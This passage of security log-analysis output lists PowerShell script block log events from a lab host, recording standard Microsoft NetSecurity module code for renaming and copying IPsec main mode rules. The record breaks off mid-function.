$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 
${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', 
Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 